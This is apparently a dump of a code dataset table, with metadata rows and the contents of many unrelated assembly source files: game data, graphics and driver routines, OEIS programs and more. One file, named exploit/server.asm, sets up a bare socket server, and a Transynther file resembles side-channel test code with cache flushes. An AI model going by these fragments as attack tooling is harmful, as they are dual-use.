hexsha stringlengths 40 40 | size int64 6 1.05M | ext stringclasses 3
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 232 | max_stars_repo_name stringlengths 7 106 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 7 | max_stars_count int64 1 33.5k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 232 | max_issues_repo_name stringlengths 7 106 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 7 | max_issues_count int64 1 37.5k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 232 | max_forks_repo_name stringlengths 7 106 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 7 | max_forks_count int64 1 12.6k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 6 1.05M | avg_line_length float64 1.16 19.7k | max_line_length int64 2 938k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b49e3b8d2348bf3defe5b75559cce0555b613e63 | 523 | asm | Assembly | data/baseStats/dodrio.asm | etdv-thevoid/pokemon-rgb-enhanced | 5b244c1cf46aab98b9c820d1b7888814eb7fa53f | [
"MIT"
] | 1 | 2022-01-09T05:28:52.000Z | 2022-01-09T05:28:52.000Z | data/baseStats/dodrio.asm | ETDV-TheVoid/pokemon-rgb-enhanced | 5b244c1cf46aab98b9c820d1b7888814eb7fa53f | [
"MIT"
] | null | null | null | data/baseStats/dodrio.asm | ETDV-TheVoid/pokemon-rgb-enhanced | 5b244c1cf46aab98b9c820d1b7888814eb7fa53f | [
"MIT"
] | null | null | null | db DODRIO ; pokedex id
db 60 ; base hp
db 110 ; base attack
db 70 ; base defense
db 110 ; base speed
db 60 ; base special
db NORMAL ; species type 1
db FLYING ; species type 2
db 45 ; catch rate
db 158 ; base exp yield
INCBIN "pic/gsmon/dodrio.pic",0,1 ; 77, sprite dimensions
dw DodrioPicFront
dw DodrioPicBack
; attack... | 18.034483 | 57 | 0.732314 |
cd92cb980d150a353da387cbf1d7a9168e089908 | 210 | asm | Assembly | libsrc/gfx/portable/drawto.asm | Frodevan/z88dk | f27af9fe840ff995c63c80a73673ba7ee33fffac | [
"ClArtistic"
] | 640 | 2017-01-14T23:33:45.000Z | 2022-03-30T11:28:42.000Z | libsrc/gfx/portable/drawto.asm | Frodevan/z88dk | f27af9fe840ff995c63c80a73673ba7ee33fffac | [
"ClArtistic"
] | 1,600 | 2017-01-15T16:12:02.000Z | 2022-03-31T12:11:12.000Z | libsrc/gfx/portable/drawto.asm | Frodevan/z88dk | f27af9fe840ff995c63c80a73673ba7ee33fffac | [
"ClArtistic"
] | 215 | 2017-01-17T10:43:03.000Z | 2022-03-23T17:25:02.000Z |
SECTION code_graphics
PUBLIC drawto
PUBLIC _drawto
EXTERN commondrawto
EXTERN plot
;void drawto(int x2, int y2) __smallc
;Note ints are actually uint8_t
drawto:
_drawto:
ld hl,plot
jp commondrawto
| 12.352941 | 38 | 0.771429 |
37251c1c67283d03a5cbe7cd35930e23a432357f | 1,062 | asm | Assembly | programs/oeis/245/A245380.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/245/A245380.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/245/A245380.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A245380: (7*n^5+5*n^3)/12.
; 0,1,22,153,624,1875,4626,9947,19328,34749,58750,94501,145872,217503,314874,444375,613376,830297,1104678,1447249,1870000,2386251,3010722,3759603,4650624,5703125,6938126,8378397,10048528,11974999,14186250,16712751,19587072,22843953,26520374,30655625,35291376,40471747,46243378,52655499,59760... | 88.5 | 909 | 0.84275 |
31a243306e7629e7c8c2f0f1cb53f92dc4bf24d3 | 498 | asm | Assembly | oeis/218/A218173.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/218/A218173.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/218/A218173.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A218173: Expansion of f(x^7, x^17) - x^2 * f(x, x^23) in powers of x where f(,) is Ramanujan's two-variable theta function.
; Submitted by Christian Krause
; 1,0,-1,-1,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,-1,0,0,-1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,-1,0,0,0,0,-... | 62.25 | 207 | 0.594378 |
045044b6cb5043e3cdfdf2ff0b8f170f014b828a | 170,240 | asm | Assembly | Appl/Term/Screen/screenMain.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 504 | 2018-11-18T03:35:53.000Z | 2022-03-29T01:02:51.000Z | Appl/Term/Screen/screenMain.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 96 | 2018-11-19T21:06:50.000Z | 2022-03-06T10:26:48.000Z | Appl/Term/Screen/screenMain.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 73 | 2018-11-19T20:46:53.000Z | 2022-03-29T00:59:26.000Z | COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Copyright (c) GeoWorks 1989 -- All Rights Reserved
PROJECT: PC GEOS
MODULE: Screen
FILE: screenMain.asm
AUTHOR: Dennis Chow, September 8, 1989
ROUTINES:
Name Description
---- -----------
?? INT ScreenResetInitialV... | 25.84877 | 84 | 0.592558 |
98d4f1bde76f4e68f5f71dd46406cec22ac4a22d | 452 | asm | Assembly | wof/lcs/123p/6C.asm | zengfr/arcade_game_romhacking_sourcecode_top_secret_data | a4a0c86c200241494b3f1834cd0aef8dc02f7683 | [
"Apache-2.0"
] | 6 | 2020-10-14T15:29:10.000Z | 2022-02-12T18:58:54.000Z | wof/lcs/123p/6C.asm | zengfr/arcade_game_romhacking_sourcecode_top_secret_data | a4a0c86c200241494b3f1834cd0aef8dc02f7683 | [
"Apache-2.0"
] | null | null | null | wof/lcs/123p/6C.asm | zengfr/arcade_game_romhacking_sourcecode_top_secret_data | a4a0c86c200241494b3f1834cd0aef8dc02f7683 | [
"Apache-2.0"
] | 1 | 2020-12-17T08:59:10.000Z | 2020-12-17T08:59:10.000Z | copyright zengfr site:http://github.com/zengfr/romhack
00249A move.l -(A6), (A4)+ [123p+ 6C, enemy+6C]
0024B6 move.l -(A6), (A4)+ [123p+ 6C, enemy+6C]
0024E8 move.l -(A6), (A4)+ [123p+ 6C, enemy+6C]
00250A move.l -(A6), (A4)+ [123p+ 6C, enemy+6C]
007A54 btst #$5, ($30,A1) [123p+ 6C, enemy+6C]
008F4C beq ... | 34.769231 | 54 | 0.626106 |
322a06e6d9e59a00ae1b2ff168568992cbdb8777 | 16,763 | asm | Assembly | Driver/Video/Dumb/VidMem/Main/mainMain.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 504 | 2018-11-18T03:35:53.000Z | 2022-03-29T01:02:51.000Z | Driver/Video/Dumb/VidMem/Main/mainMain.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 96 | 2018-11-19T21:06:50.000Z | 2022-03-06T10:26:48.000Z | Driver/Video/Dumb/VidMem/Main/mainMain.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 73 | 2018-11-19T20:46:53.000Z | 2022-03-29T00:59:26.000Z | COMMENT }%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Copyright (c) Berkeley Softworks 1988 -- All Rights Reserved
PROJECT: PC GEOS
MODULE: Memory video drivers
FILE: mainMain.asm
AUTHOR: Jim DeFrisco
ROUTINES:
Name Description
---- -----------
DriverStrategy entry ... | 24.834074 | 79 | 0.569409 |
43f319dcf6c3c65dcd2b0c216dee586342d7df25 | 1,033 | asm | Assembly | aom_20170505/aom_ports/emms.asm | rainliu/aom_analyzer | 440652d155140c00a2827512a54103be3d6ff7e4 | [
"MIT"
] | null | null | null | aom_20170505/aom_ports/emms.asm | rainliu/aom_analyzer | 440652d155140c00a2827512a54103be3d6ff7e4 | [
"MIT"
] | null | null | null | aom_20170505/aom_ports/emms.asm | rainliu/aom_analyzer | 440652d155140c00a2827512a54103be3d6ff7e4 | [
"MIT"
] | null | null | null | ;
; Copyright (c) 2016, Alliance for Open Media. All rights reserved
;
; This source code is subject to the terms of the BSD 2 Clause License and
; the Alliance for Open Media Patent License 1.0. If the BSD 2 Clause License
; was not distributed with this source code in the LICENSE file, you can
; obtain it at ww... | 24.595238 | 78 | 0.691191 |
bc8946fc771203efa0415fa1a623cdc2b7b0451f | 448 | asm | Assembly | programs/oeis/131/A131844.asm | jmorken/loda | 99c09d2641e858b074f6344a352d13bc55601571 | [
"Apache-2.0"
] | 1 | 2021-03-15T11:38:20.000Z | 2021-03-15T11:38:20.000Z | programs/oeis/131/A131844.asm | jmorken/loda | 99c09d2641e858b074f6344a352d13bc55601571 | [
"Apache-2.0"
] | null | null | null | programs/oeis/131/A131844.asm | jmorken/loda | 99c09d2641e858b074f6344a352d13bc55601571 | [
"Apache-2.0"
] | null | null | null | ; A131844: 3*A131821 - 2*A000012.
; 1,4,4,7,1,7,10,1,1,10,13,1,1,1,13,16,1,1,1,1,16,19,1,1,1,1,1,19,22,1,1,1,1,1,1,22,25,1,1,1,1,1,1,1,25,28,1,1,1,1,1,1,1,1,28
mov $3,$0
mov $5,2
lpb $5
mov $0,$3
sub $5,1
add $0,$5
sub $0,1
mov $4,1
lpb $0
add $4,1
sub $0,$4
trn $0,$4
add $0,$4
lpe
mul ... | 14 | 125 | 0.491071 |
7efc1edf413f62b78ffe72f901f95d3ccd46178b | 1,058 | asm | Assembly | exploit/server.asm | roguematter/malware-csg513 | 959ecdfad5efc8c95fd7143ef243fc07366f29e8 | [
"CC0-1.0"
] | null | null | null | exploit/server.asm | roguematter/malware-csg513 | 959ecdfad5efc8c95fd7143ef243fc07366f29e8 | [
"CC0-1.0"
] | null | null | null | exploit/server.asm | roguematter/malware-csg513 | 959ecdfad5efc8c95fd7143ef243fc07366f29e8 | [
"CC0-1.0"
] | null | null | null | section .text
global _start
_socket:
mov eax,102
mov ebx,1
mov ecx,esp
add ecx,4
int 0x80
ret 12
_bind:
mov eax,102
mov ebx,2
mov ecx,esp
add ecx,4
int 0x80
ret 28
_listen:
mov eax,102
mov ebx,4
mov ecx,esp
add ecx,4
int 0x80
ret 5
_accept:
mov eax,102
mov ebx,5
mov ecx,esp
add ecx,4
int 0x80
... | 11.020833 | 18 | 0.700378 |
be3fe84240f9b4bd200d38a1bd7b9e5e7510d9f2 | 5,353 | asm | Assembly | src/cm_equipment.asm | spannerisms/lttphack | 8309fecd1b73db4d81616ec500253ae1aa52b399 | [
"MIT"
] | 6 | 2020-02-14T17:14:52.000Z | 2021-12-06T19:51:25.000Z | src/cm_equipment.asm | spannerisms/lttphack | 8309fecd1b73db4d81616ec500253ae1aa52b399 | [
"MIT"
] | 1 | 2020-09-26T07:40:33.000Z | 2020-09-26T07:40:33.000Z | src/cm_equipment.asm | spannerisms/lttphack | 8309fecd1b73db4d81616ec500253ae1aa52b399 | [
"MIT"
] | 7 | 2019-12-02T21:51:51.000Z | 2021-07-03T17:53:04.000Z | EQUIPMENT_SUBMENU:
%menu_header("EQUIPMENT", 19)
;===================================================================================================
%numfield_long_func_prgtext("Health", $7EF36D, 0, $A0, 8, this, cm_draw_hp)
LDA.l $7EF36D
CMP.l $7EF36C
BCC ..not_max
LDA.l $7EF36C
BRA ..set
..not_max
BIT.b SA1... | 28.935135 | 100 | 0.445171 |
83a01a642d685277626907d7087dbdcce76296b3 | 665,807 | asm | Assembly | xv6/kernel.asm | ZhangHnu/xv6FileSystem | a1bb5b607c45f8fa833f8f7b62aa2563d2b9007c | [
"MIT"
] | null | null | null | xv6/kernel.asm | ZhangHnu/xv6FileSystem | a1bb5b607c45f8fa833f8f7b62aa2563d2b9007c | [
"MIT"
] | null | null | null | xv6/kernel.asm | ZhangHnu/xv6FileSystem | a1bb5b607c45f8fa833f8f7b62aa2563d2b9007c | [
"MIT"
] | null | null | null |
kernel: file format elf32-i386
Disassembly of section .text:
80100000 <multiboot_header>:
80100000: 02 b0 ad 1b 00 00 add 0x1bad(%eax),%dh
80100006: 00 00 add %al,(%eax)
80100008: fe 4f 52 decb 0x52(%edi)
8010000b: e4 0f in $0xf,%al
8010000c <entry>:... | 32.790298 | 74 | 0.537584 |
116a47d3637754570280b071e399ad6b112ba6d9 | 39,470 | asm | Assembly | Library/SpecUI/CommonUI/CMain/cmainCode.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 504 | 2018-11-18T03:35:53.000Z | 2022-03-29T01:02:51.000Z | Library/SpecUI/CommonUI/CMain/cmainCode.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 96 | 2018-11-19T21:06:50.000Z | 2022-03-06T10:26:48.000Z | Library/SpecUI/CommonUI/CMain/cmainCode.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 73 | 2018-11-19T20:46:53.000Z | 2022-03-29T00:59:26.000Z | COMMENT @-----------------------------------------------------------------------
Copyright (c) GeoWorks 1988 -- All Rights Reserved
PROJECT: PC GEOS
MODULE: OpenLook/Main
FILE: mainCode.asm
ROUTINES:
Name Description
---- -----------
GLB LibraryEntry Entry point for this library.
INT ... | 24.684178 | 81 | 0.664733 |
50ddd3e894eb94f948438a3da5d5ad1c78bc91b2 | 1,318 | asm | Assembly | iBUS/USART_RX.asm | aryan-gupta/Quadrino | ffd7993e55cc95b37c44b1a517a25cfc3a065ba0 | [
"MIT"
] | null | null | null | iBUS/USART_RX.asm | aryan-gupta/Quadrino | ffd7993e55cc95b37c44b1a517a25cfc3a065ba0 | [
"MIT"
] | null | null | null | iBUS/USART_RX.asm | aryan-gupta/Quadrino | ffd7993e55cc95b37c44b1a517a25cfc3a065ba0 | [
"MIT"
] | 1 | 2018-08-06T09:08:20.000Z | 2018-08-06T09:08:20.000Z | ISR(USART_RX_vect) {
static uint8_t* loc = buffer_start;
uint8_t data = UDR0;
if (loc == buffer_start or loc == buffer2_start) {
if (data != 0x20) return;
}
*loc = data;
loc++;
if (loc == buffer2_start) { // technically we only need to compare the LSB because its an array
buff1_ready = true;
buff2_re... | 20.59375 | 96 | 0.656297 |
44d714af660b60a35d370cae52e74031b63b75fe | 1,178 | asm | Assembly | ShitHead/Bits/udg.asm | simonlaszcz/ShitHead | 53bf19ceaba458b9ce4cd3e9be75ab77f1778eee | [
"MIT"
] | null | null | null | ShitHead/Bits/udg.asm | simonlaszcz/ShitHead | 53bf19ceaba458b9ce4cd3e9be75ab77f1778eee | [
"MIT"
] | null | null | null | ShitHead/Bits/udg.asm | simonlaszcz/ShitHead | 53bf19ceaba458b9ce4cd3e9be75ab77f1778eee | [
"MIT"
] | null | null | null | CARDBACK_A
defb %01111111
defb %10000000
defb %10000000
defb %10000000
defb %10001111
defb %10001101
defb %10001010
defb %10001101
CARDBACK_B
defb %11111111
defb %00000000
defb %00000000
defb %00000000
defb %11111111
defb %01010101
defb %10101010
defb %01010101
CARDBACK_C
defb %11111110
defb %00000001
defb %00000001
de... | 14.54321 | 14 | 0.809847 |
6e6ed159cfcc55963125e64b31f06b580c40a897 | 949 | asm | Assembly | libsrc/target/excali64/gencon/copy_font.asm | jpoikela/z88dk | 7108b2d7e3a98a77de99b30c9a7c9199da9c75cb | [
"ClArtistic"
] | 640 | 2017-01-14T23:33:45.000Z | 2022-03-30T11:28:42.000Z | libsrc/target/excali64/gencon/copy_font.asm | jpoikela/z88dk | 7108b2d7e3a98a77de99b30c9a7c9199da9c75cb | [
"ClArtistic"
] | 1,600 | 2017-01-15T16:12:02.000Z | 2022-03-31T12:11:12.000Z | libsrc/target/excali64/gencon/copy_font.asm | jpoikela/z88dk | 7108b2d7e3a98a77de99b30c9a7c9199da9c75cb | [
"ClArtistic"
] | 215 | 2017-01-17T10:43:03.000Z | 2022-03-23T17:25:02.000Z |
SECTION code_graphics
PUBLIC copy_font
defc PCG_RAM = $4000
; Copy a font into page 0 of the PCG memory
; Entry: bc =font
; l = start character
; h = number of characters
copy_font:
ld a,h
push af
; Each character is 12 rows
ld h,0
add hl,hl ;x2
add hl,hl ;x4
ld d,h
ld e,l
add hl,hl ;x8
;add h... | 12.012658 | 47 | 0.632244 |
3deea73cd5e7b9377a0c15f9a7fadada72896a99 | 10,555 | asm | Assembly | kMouse.asm | satadriver/LiunuxOS_t | c6222f04b6e734002cbf1aa366eb62e51f0ebbe5 | [
"Apache-2.0"
] | null | null | null | kMouse.asm | satadriver/LiunuxOS_t | c6222f04b6e734002cbf1aa366eb62e51f0ebbe5 | [
"Apache-2.0"
] | null | null | null | kMouse.asm | satadriver/LiunuxOS_t | c6222f04b6e734002cbf1aa366eb62e51f0ebbe5 | [
"Apache-2.0"
] | null | null | null | .386p
;include 8042_8048_info.asm
Kernel Segment public para use32
assume cs:Kernel
;mouse direction is from left,top to right down,so the x delta is right,but y delta is negtive
align 10h
__kMouseProc proc
pushad
push ds
push es
push fs
push gs
push ss
mov ax,rwData32Seg
mov ds,ax
mov es,ax
mov ebx,kernelData
shl... | 17.76936 | 94 | 0.744766 |
ae4a11286169a8bf5e60bbb8db387ed073432061 | 13,622 | asm | Assembly | Data/ShipModels.asm | ped7g/EliteNext | 6e930f9b9924b295d7281ee6acb879600d7e597f | [
"Unlicense"
] | null | null | null | Data/ShipModels.asm | ped7g/EliteNext | 6e930f9b9924b295d7281ee6acb879600d7e597f | [
"Unlicense"
] | null | null | null | Data/ShipModels.asm | ped7g/EliteNext | 6e930f9b9924b295d7281ee6acb879600d7e597f | [
"Unlicense"
] | null | null | null |
; For ship number A fetch the adjusted ship number in B and bank number in A for the respective ship based on the ship table
IFDEF SHIPBANKA
GetShipModelId:
GetShipModelIdA: ld c,a
ld hl,ShipModelBankA ; Ship Model BankA, B and C ... | 41.913846 | 216 | 0.443914 |
7eeb26d2ae3eee73327468f2b6a72f473743093c | 1,468 | asm | Assembly | iod/con2/ptr/sptr.asm | olifink/smsqe | c546d882b26566a46d71820d1539bed9ea8af108 | [
"BSD-2-Clause"
] | null | null | null | iod/con2/ptr/sptr.asm | olifink/smsqe | c546d882b26566a46d71820d1539bed9ea8af108 | [
"BSD-2-Clause"
] | null | null | null | iod/con2/ptr/sptr.asm | olifink/smsqe | c546d882b26566a46d71820d1539bed9ea8af108 | [
"BSD-2-Clause"
] | null | null | null | * Set pointer position V1.01 1986 Tony Tebby QJUMP
*
section driver
*
xdef pt_sptr
xdef pt_cptr
*
xref pt_fwind
*
include 'dev8_keys_con'
include 'dev8_keys_err'
include 'dev8_mac_assert'
*
pt_cptr
move.l sd_sewll(a0),d0 ; any secondary?
beq.s ptcp_set ; ... no
move.l a0,-(sp)
ptcp_scloop
move.l d0,a... | 20.971429 | 61 | 0.68733 |
dda71583504f410dc146b63a146f6b65e3a5f115 | 6,709 | asm | Assembly | Transynther/x86/_processed/NC/_zr_/i9-9900K_12_0xa0.log_21829_1817.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NC/_zr_/i9-9900K_12_0xa0.log_21829_1817.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NC/_zr_/i9-9900K_12_0xa0.log_21829_1817.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r13
push %r15
push %r8
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_normal_ht+0x1793f, %rcx
nop
nop
nop
nop
and $50084, %rbx
movl $0x61626364, (%rcx)
cmp $33983, %r13
lea addresses_A_ht+0x713f, %r12
clflush (%r12)
nop
inc %r13
mov (%r12), %esi
inc %r... | 36.069892 | 2,999 | 0.659264 |
1031c5cc1c11fdfb2c48095cf9e23d8db868d9b1 | 437 | asm | Assembly | util/gut/smul.asm | olifink/smsqe | c546d882b26566a46d71820d1539bed9ea8af108 | [
"BSD-2-Clause"
] | null | null | null | util/gut/smul.asm | olifink/smsqe | c546d882b26566a46d71820d1539bed9ea8af108 | [
"BSD-2-Clause"
] | null | null | null | util/gut/smul.asm | olifink/smsqe | c546d882b26566a46d71820d1539bed9ea8af108 | [
"BSD-2-Clause"
] | null | null | null | ; General IO utility: send multiple bytes V2.00 1988 Tony Tebby
section gen_util
xdef gu_smul
xref gu_iowp
include 'dev8_keys_qdos_io'
;+++
; This routine sends multiple bytes
;
; d2 c p number of bytes to send
; a0 c p channel ID
; a1 c p pointer to... | 18.208333 | 69 | 0.569794 |
3ca6aa96bf8f87618755e8610fb682eec034c82d | 452 | asm | Assembly | libsrc/stdio/sprinter/puts_cons.asm | grancier/z180 | e83f35e36c9b4d1457e40585019430e901c86ed9 | [
"ClArtistic"
] | null | null | null | libsrc/stdio/sprinter/puts_cons.asm | grancier/z180 | e83f35e36c9b4d1457e40585019430e901c86ed9 | [
"ClArtistic"
] | null | null | null | libsrc/stdio/sprinter/puts_cons.asm | grancier/z180 | e83f35e36c9b4d1457e40585019430e901c86ed9 | [
"ClArtistic"
] | 1 | 2019-12-03T23:57:48.000Z | 2019-12-03T23:57:48.000Z | ;
; Small C+ Z88 Internal Routine
; Puts a string to the console - mapping \n to \n\l as we
; go and appending \n\l to the end of the line
;
; Non standard (for short programs)
;
; djm 2/4/99
;
;
; $Id: puts_cons.asm,v 1.5 2016/05/15 20:15:46 dom Exp $
;
SECTION code_clib
... | 14.580645 | 63 | 0.603982 |
8d37a07c78a1394967c86cf620a5701f4f7caf05 | 267 | asm | Assembly | libsrc/_DEVELOPMENT/stdio/c/sdcc_ix/clearerr_unlocked_fastcall.asm | jpoikela/z88dk | 7108b2d7e3a98a77de99b30c9a7c9199da9c75cb | [
"ClArtistic"
] | 640 | 2017-01-14T23:33:45.000Z | 2022-03-30T11:28:42.000Z | libsrc/_DEVELOPMENT/stdio/c/sdcc_ix/clearerr_unlocked_fastcall.asm | jpoikela/z88dk | 7108b2d7e3a98a77de99b30c9a7c9199da9c75cb | [
"ClArtistic"
] | 1,600 | 2017-01-15T16:12:02.000Z | 2022-03-31T12:11:12.000Z | libsrc/_DEVELOPMENT/stdio/c/sdcc_ix/clearerr_unlocked_fastcall.asm | jpoikela/z88dk | 7108b2d7e3a98a77de99b30c9a7c9199da9c75cb | [
"ClArtistic"
] | 215 | 2017-01-17T10:43:03.000Z | 2022-03-23T17:25:02.000Z |
; void clearerr_unlocked_fastcall(FILE *stream)
SECTION code_clib
SECTION code_stdio
PUBLIC _clearerr_unlocked_fastcall
EXTERN asm_clearerr_unlocked
_clearerr_unlocked_fastcall:
push hl
ex (sp),ix
call asm_clearerr_unlocked
pop ix
ret
| 13.35 | 47 | 0.76779 |
8d641dc242419d2f235b1235150a2d9881b3661c | 345 | asm | Assembly | programs/oeis/292/A292543.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | 1 | 2021-03-15T11:38:20.000Z | 2021-03-15T11:38:20.000Z | programs/oeis/292/A292543.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/292/A292543.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | ; A292543: Number of 5-cycles in the n-Sierpinski tetrahedron graph.
; 0,96,384,1536,6144,24576,98304,393216,1572864,6291456,25165824,100663296,402653184,1610612736,6442450944,25769803776,103079215104,412316860416,1649267441664,6597069766656,26388279066624,105553116266496,422212465065984,1688849860263936
mov $1,4
pow ... | 43.125 | 236 | 0.828986 |
0f1f7f711a48aa0770feb9292cfd790c1c6b95eb | 12 | asm | Assembly | src/test/resources/data/searchtests/test4-expected.asm | cpcitor/mdlz80optimizer | 75070d984e1f08474e6d397c7e0eb66d8be0c432 | [
"Apache-2.0"
] | 36 | 2020-06-29T06:52:26.000Z | 2022-02-10T19:41:58.000Z | src/test/resources/data/searchtests/test4-expected.asm | cpcitor/mdlz80optimizer | 75070d984e1f08474e6d397c7e0eb66d8be0c432 | [
"Apache-2.0"
] | 39 | 2020-07-02T18:19:34.000Z | 2022-03-27T18:08:54.000Z | src/test/resources/data/searchtests/test4-expected.asm | cpcitor/mdlz80optimizer | 75070d984e1f08474e6d397c7e0eb66d8be0c432 | [
"Apache-2.0"
] | 7 | 2020-07-02T06:00:05.000Z | 2021-11-28T17:31:13.000Z | ld b, c
| 6 | 11 | 0.333333 |
98300ff766b9a68691756c9a61f9a9f270dbf352 | 440 | asm | Assembly | oeis/270/A270715.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/270/A270715.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/270/A270715.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A270715: a(n) = ((n+2)/2)*Sum_{k=0..n/2}(Sum_{i=0..n-2*k}(binomial(k+1,n-2*k-i)*binomial(k+i,k))/(k+1).
; Submitted by Simon Strandgaard
; 1,3,5,10,19,35,65,120,221,407,749,1378,2535,4663,8577,15776,29017,53371,98165,180554,332091,610811,1123457,2066360,3800629,6990447,12857437,23648514,43496399,80002351,147147265
m... | 25.882353 | 178 | 0.65 |
82ab03b1f6bc9f7ac3726d4d1fe39ca593d70ff6 | 401 | asm | Assembly | programs/oeis/266/A266300.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/266/A266300.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/266/A266300.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A266300: Triangle read by rows giving successive states of cellular automaton generated by "Rule 15" initiated with a single ON (black) cell.
; 1,1,1,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,... | 57.285714 | 201 | 0.61596 |
83b18d0b7a16b8d541d2cca783113a9af180c508 | 5,557 | asm | Assembly | software/obsolete/new-rom/taskbar.asm | Noah1989/micro-21 | f574c3dd089ee93737c8babc6f5eddf85e66987e | [
"MIT"
] | 1 | 2019-05-17T14:43:17.000Z | 2019-05-17T14:43:17.000Z | software/obsolete/new-rom/taskbar.asm | Noah1989/loopmicro | 4d9a49b0aeee1d58aa712c7509cbb46d32477e16 | [
"MIT"
] | null | null | null | software/obsolete/new-rom/taskbar.asm | Noah1989/loopmicro | 4d9a49b0aeee1d58aa712c7509cbb46d32477e16 | [
"MIT"
] | null | null | null | public taskbar_window
extern ui_box_IX_fill_color_L_character_H
extern ui_box_IX_calculate_absolute_position_DE
extern ui_widget_IX_draw
extern ui_label_IX_draw
extern ui_panel_IX_draw
